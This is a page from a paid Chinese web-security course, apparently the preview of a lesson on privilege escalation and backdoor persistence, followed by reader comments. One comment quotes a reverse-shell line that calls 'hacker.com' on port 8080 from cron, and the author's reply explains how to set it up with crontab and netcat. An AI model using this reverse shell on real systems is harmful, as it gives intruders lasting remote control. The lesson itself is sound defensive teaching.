安全攻防技能 30 讲
何为舟
前微博安全研发负责人
34681 人已学习
新⼈⾸单¥59
登录后,你可以任选4讲全文学习
课程目录
已完结/共 41 讲
开篇词 (1讲)
安全攻防技能 30 讲
15
15
1.0x
00:00/00:00
登录|注册

12 | 权限提升和持久化:为什么漏洞修复了,黑客还是能够自由进出?

总结
权限持久化
权限提升
漏洞修复后的问题
Web安全

该思维导图由 AI 生成,仅供参考

你好,我是何为舟。
我在 Web 安全的前 6 讲中,给你讲解了各种漏洞的产生和防护方法,比如:XSS、SQL 注入、CSRF、SSRF 和插件漏洞。除了这些漏洞之外,我也着重强调了一点,黑客善于通过“蛛丝马迹”推断出代码逻辑,然后发起攻击。学习了这些内容,在实际工作的过程中,我们其实就能基本避免大部分的 Web 安全问题了。但是,有一天,我又遇到了新的问题。
某一天,当我在进行日常审计的时候,突然发现内网有黑客的操作痕迹。于是,我马上对黑客的攻击路径进行溯源。最后发现黑客是通过某个应用的 SSRF 漏洞进入的。
之前我们提到过,SSRF 通常用来作内网探测,那么黑客是如何通过 SSRF 拿到服务器权限的呢?更神奇的是,这个存在 SSRF 漏洞的应用,在排查的时候早已经下线了。那么,黑客是如何在漏洞已经下线的情况下,仍然能够进出内网呢?

权限提升:为什么黑客能通过 SSRF 拿到服务器权限?

首先,我们先来搞清楚,黑客是如何通过 SSRF 拿到服务器权限的。在解决这个问题之前,我们先来了解一个概念,权限提升。
在应用或系统中,黑客或者被黑客控制的用户,通常会通过漏洞攻击或者利用弱密码,获取到其他用户的权限。在获取了新的用户权限之后,黑客就能够以新用户的身份去窃取和篡改数据,进行非法的操作了。这就是权限提升(Privilege Escalation)。也就是说,黑客可以通过不断获取新的身份,来不断扩大(或者叫提升)自己的权限,不断扩大攻击影响,最终实现控制整个系统。
确认放弃笔记?
放弃后所记笔记将不保留。
新功能上线,你的历史笔记已初始化为私密笔记,是否一键批量公开?
批量公开的笔记不会为你同步至部落
公开
同步至部落
取消
完成
0/2000
荧光笔
直线
曲线
笔记
复制
AI
  • 深入了解
  • 翻译
    • 英语
    • 中文简体
    • 中文繁体
    • 法语
    • 德语
    • 日语
    • 韩语
    • 俄语
    • 西班牙语
    • 阿拉伯语
  • 解释
  • 总结

黑客利用漏洞进入系统后,通过权限提升和后门实现自由进出。权限提升分为水平提升和垂直提升,黑客通过获取新的身份或利用漏洞获得权限来扩大攻击影响。漏洞修复并非能够避免权限提升的发生,黑客可以留下后门,通过快速通道轻松进入系统,长时间保持高权限的通道,进行长时间的潜伏和攻击。 文章介绍了“后门”是如何工作的,以及黑客如何将“后门”植入到系统。后门通常以木马、Rootkit或WebShell等形式运行在系统中,黑客可以通过直接通信与后门来获得服务器的操控权限。黑客将后门植入系统的方式包括通过权限提升获取系统的命令执行权限,通过文件上传漏洞向服务器上传程序,并保证后门的持久化。 面对权限提升和持久化,文章提出了两种常见的防护方法:最小权限原则和IDS。最小权限原则通过限制用户和进程的权限来限制黑客的权限提升收益,而IDS则通过检测黑客的异常行为来识别攻击。最后,文章总结了黑客的操作和系统防护的重点内容,强调了防止黑客进一步攻击的重要性。 总的来说,文章深入探讨了黑客利用漏洞进入系统后的操作和系统防护的方法,为读者提供了全面的技术知识和防护建议。

仅可试看部分内容,如需阅读全部内容,请付费购买文章所属专栏
《安全攻防技能 30 讲》
新⼈⾸单¥59
立即购买
登录 后留言

全部留言(16)

  • 最新
  • 精选
  • 小晏子
    有了内网服务器上的普通用户的权限,意味着我能拿到这个服务器上的代码,那么可以反编译他的代码获取代码里的各种漏洞,还可以进行内网探测,用ssh扫描所有内网服务器,试着进行权限提升,获取管理员权限,之后就好比在自己的服务上想干什么就干什么了,再做权限持久化,下个rootkit什么的方便下次进入。另外获取了他的代码也意味着能拿到他的数据存储的用户名密码,就可以获取他所有的用户数据等。

    作者回复: 总之就是为所欲为了~

    2020-01-03
    14
  • 程序员二师兄
    “比如说,黑客在进入服务器之后,会留下下面这样一个脚本,让这个脚本,每分钟都执行一次:bash -i >& /dev/tcp/hacker.com/8080 0>&1这个脚本运行后,只要 hack.com 的 8080 端口打开,那么服务器就会通过 TCP 获取 8080 端口返回的命令并执行。因此,只要黑客任意时刻在 hacker.com 中监听 8080 端口(比如通过 nc -l 8080),就可以获得服务器定时送上来的命令执行权限。” 我是一个安全小白,这段话没太看明白,自己现在有两台服务器,想模拟上面讲的这个命令,这个要怎么操作呢?

    作者回复: 假设服务器B的ip是2.2.2.2,在服务器A的crontab中写入bash -i >& /dev/tcp/2.2.2.2/8080 0>&1 。然后在B中执行nc -l 8080。等待一会,就可以在nc中输入命令,而命令实际执行在A上。

    2020-03-27
    3
    9
  • hello
    老师,请教个问题,针对文件服务器,针对上传的文件类型进行白名单校验(魔数),然后存储时对文件进行了加密,那么针对文件服务器上传下载还有其它安全防护手段吗?对文件进行加密能否规避植入“后门”?

    作者回复: 基本能够规避。还有就是限定上传的目录,比如放到一个单独的目录中,而不是在Web服务的目录中。

    2020-01-03
    4
  • humor
    既然Windows会有后门,那Linux会不会也有后门呀?我们怎么能够检测出来Linux是否有后门呢?

    作者回复: 都会有后门的。后门的检测主要依靠人工审计和安全工具。主要原理都是看系统内有没有可疑的进程,老是对外发一些未知请求,或者一直监听未知的端口等。

    2020-01-14
    3
  • 二马
    1、在进行日常审计的时候,突然发现内网有黑客的操作痕迹。 请问是怎么发现操作痕迹的,有哪些痕迹,谢谢! 2、只要黑客任意时刻在 hacker.com 中监听 8080 端口(比如通过 nc -l 8080),就可以获得服务器定时送上来的命令执行权限。 内网的服务器主动访问互联网不是只允许访问指定网站嘛,或者是主动访问外部采取白名单的方式是否能有效预防这类后门攻击。 最小权限原则包括用户层面、程序(进程)层面和服务器(IP)层面,如这台服务器在内网横向能访问哪些服务器和被哪些服务器访问,纵向能访问哪些互联网服务器。

    作者回复: 1、其实就是在挖矿,然后导致服务器利用率激增,因此才发现的异常。 2、白名单确实可以预防。但很多公司管理并不严格,服务器是可以直接访问外网的。这类外网需求其实也比较常见,更新个系统,拉取个docker镜像啥的。

    2020-01-04
    2
  • 皮特尔
    虽然限于篇幅,很多问题没有深入展开,但满满的都是干货。师傅领进门,修行在个人。给老师点赞👍

    作者回复: 嗯,安全跨服比较广,每一个方向都可以挖得很深。可以结合工作需要,选择合适的方向。

    2020-05-22
    1
  • 二马
    老师好,在服务器性能异常才能发现,这属于被动发现,根据排查描述,是发现其攻击的轨迹,攻击过程是有蛛丝马迹的,可能是从日志分析出来的。那是否能做到事前发现,比如定期分析日志中ssh,数据库连接等高危操作端口的日志,对比排查服务器权限,是否有横向扩大的迹象。在这属于审计工作,实现是否困难。

    作者回复: 这就需要使用各种安全产品来进行自动化的检测和审计工作了,在后续的模块中会进行介绍。

    2020-01-10
    1
  • 小老鼠
    如何测试系统中是否存在权限提升和持久化漏洞?

    作者回复: 更多是需要手动作审计,看是否能通过一些具备root权限的进程,实现权限提升。对于后门的检测,就更困难了,需要对系统内异常的进程、脚本、网络连接等进行监控和分析。后面会讲到的IDS能一定程度上进行检测。

    2020-01-05
    1
  • 此心如水只東流
    老师,黑客进入系统后不会擦出痕迹吗?我们可以通过什么方法检查出系统有没有被黑客入侵呢?

    作者回复: 一般会有些痕迹,比如ssh的登录记录之类的。不过,消除痕迹也是黑客的技能之一,如果安全基础建设差,日志和监控做得不好,雁过无痕还是比较简单的。

    2020-07-02
    2
  • 小老鼠
    点击挟持为什么不讲

    作者回复: 专栏内容有限,确实覆盖不全。有问题欢迎留言沟通~

    2020-01-05
收起评论
显示
设置
留言
16
收藏
沉浸
阅读
分享
手机端
快捷键
回顶部